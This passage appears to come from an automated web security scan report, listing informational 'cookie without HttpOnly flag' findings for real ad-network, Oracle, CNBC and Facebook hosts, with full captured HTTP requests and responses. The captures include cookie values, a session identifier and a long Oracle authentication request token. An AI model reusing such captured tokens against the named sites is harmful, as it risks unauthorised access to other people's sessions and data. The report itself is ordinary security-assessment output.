The following cookie was issued by the application and does not have the HttpOnly flag set:__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __adroll=a93684bbe302491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 06 Sep 2011 15:32:13 GMT Connection: keep-aliveSet-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
13.75. http://d.ads.readwriteweb.com/ck.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.ads.readwriteweb.com
Path:
/ck.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ck.php HTTP/1.1 Host: d.ads.readwriteweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:27 GMT Server: Apache X-Powered-By: PHP/5.2.11 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID"Set-Cookie: OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
13.76. http://d.ads.readwriteweb.com/spc.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.ads.readwriteweb.com
Path:
/spc.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 15:32:48 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spc.php?zones=sp_1L%3D2%7Csp_1R%3D3%7Csp_2L%3D4%7Csp_2R%3D5%7Csp_3L%3D6%7Csp_3R%3D7%7Csp_4L%3D8%7Csp_4R%3D9%7Csp_5L%3D10%7Csp_5R%3D11%7Csp_6L%3D12%7Csp_6R%3D13%7C&nz=1&source=&r=16694381&block=1&blockcampaign=1&charset=UTF-8&loc=http%3A//www.readwriteweb.com/enterprise/2010/11/oracle.php&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1 Host: d.ads.readwriteweb.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mobify=0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:48 GMT Server: Apache X-Powered-By: PHP/5.2.11 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID"Set-Cookie: OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 15:32:48 GMT; path=/ Content-Size: 8267 Connection: close Content-Type: application/x-javascript; charset=UTF-8 Content-Length: 8267 var OA_output = new Array(); OA_output['sp_1L'] = ''; OA_output['sp_1L'] += "<"+"a href=\'http://d.ads.readwriteweb.com/ck.php?oaparams=2__bannerid=185451__zoneid=2__cb=5eaacf5574__r_id=da06d5023c8bd...[SNIP]...
13.77. http://d1.openx.org/ck.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d1.openx.org
Path:
/ck.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:OAID=eed20980e83e7cfea7f31868510023af; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ck.php HTTP/1.1 Host: d1.openx.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:27 GMT Server: Apache X-Powered-By: PHP/5.2.11 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID"Set-Cookie: OAID=eed20980e83e7cfea7f31868510023af; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
13.78. http://developers.facebook.com/plugins/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://developers.facebook.com
Path:
/plugins/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plugins/ HTTP/1.1 Host: developers.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: /docs/plugins P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache X-UA-Compatible: IE=edge X-XSS-Protection: 0Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 X-FB-Server: 10.136.195.105 Connection: close Date: Tue, 06 Sep 2011 17:06:31 GMT Content-Length: 0
13.79. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/cgi-bin/shopcart/viewcart.cgi
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cgi-bin/shopcart/viewcart.cgi HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/htmlSet-Cookie: shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: territoryCode=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: lang=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: org_id=1001; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: source=OU; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819944031981,1) Date: Tue, 06 Sep 2011 15:59:33 GMT Content-Length: 5316 <html> <head> <title>Oracle University: Empty Shopping Cart</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <SCRIPT LANGUAGE="JavaScript"> var orgid = 1001; var lan...[SNIP]...
13.80. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/db_pages.getpage
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=402&p_nl=ORSL&intcmp=WWOCOMINTMAINPAGEBNR HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 6859 Content-Type: text/html; charset=UTF-8Set-Cookie: p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/ Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/ Set-Cookie: p_lang=US; domain=.oracle.com; path=/ Set-Cookie: p_cur_URL=0; domain=.oracle.com; path=/ Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057867188663244,0) Date: Tue, 06 Sep 2011 15:59:24 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me...[SNIP]...
13.81. http://imp.fetchback.com/serve/fb/adtag.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/adtag.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /serve/fb/adtag.js?tid=11792&type=mrect HTTP/1.1 Host: imp.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:16 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:00:16 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 204 document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"><"+"/iframe"+">"...[SNIP]...
13.82. http://imp.fetchback.com/serve/fb/imp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/imp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/imp?tid=11792&type=mrect HTTP/1.1 Host: imp.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:16 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:00:16 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 5114 <style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css"> /* TODO customize this sample style Syntax recommendation http://www.w3.org/TR/REC-CSS2/ */ button.fb-fi...[SNIP]...
13.83. http://lct.salesforce.com/sfga.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://lct.salesforce.com
Path:
/sfga.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerlct-pool=70574602.38687.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sfga.js HTTP/1.1 Host: lct.salesforce.com Proxy-Connection: keep-alive Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:34:06 GMTSet-Cookie: BIGipServerlct-pool=70574602.38687.0000; path=/ Content-Length: 9247 var _kd = document; var _kdlh = _kd.location.href; var _ki,_kq,_kv; var _kwtlForm; var _kretURL; var _kwtlOnSubmit; var _koid; function __krand() { return Math.round(Math.random() * 256).toString...[SNIP]...
13.84. http://legolas.nexac.com/lgalt
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://legolas.nexac.com
Path:
/lgalt
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:lgtix=SQACADUB; path=/; expires=Fri, 05 Sep 2014 14:59:01 GMT; domain=.legolas-media.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lgalt?ci=7&ti=73&sti=28&sei=0&sci=2&ai=0&mi=0&pbi=0&sts=1315321125460777&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1 Host: legolas.nexac.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 14:59:01 GMT Server: Apache Expires: -1 Cache-Control: no-cache; no-store Content-Type: text/html; charset=iso-8859-1 Location: http://r.nexac.com/e/getdata.xgi?na_id=ignore&dt=br&pkey=mxpq23ivacz82&ru=http://rt.legolas-media.com/lgrt?ci=1%26ti=74%26vi=7%26sti=28%26sts=1315321125460777%26ui=fb069b82-5953-4473-8ae5-0a80415bcdc8%26na_id=<na_id>%26na_mp=<na_mp>%26na_da=<na_da>Set-Cookie: lgtix=SQACADUB; path=/; expires=Fri, 05 Sep 2014 14:59:01 GMT; domain=.legolas-media.com P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Content-Length: 462 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://r.nexac.com/e/getdata.xgi?na_id=ignore&a...[SNIP]...
13.85. https://login.cnbc.com/cas/logout
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/logout
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/logout HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:04:31 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/ Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Location: http://www.cnbc.com Content-Language: en Content-Length: 0 Connection: close Content-Type: text/html;charset=ISO-8859-1
13.86. https://login.oracle.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: login.oracle.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 16:14:14 GMT Content-Length: 1214 Content-Type: text/html; charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He...[SNIP]...
13.87. https://login.oracle.com/mysso/signon.jsp
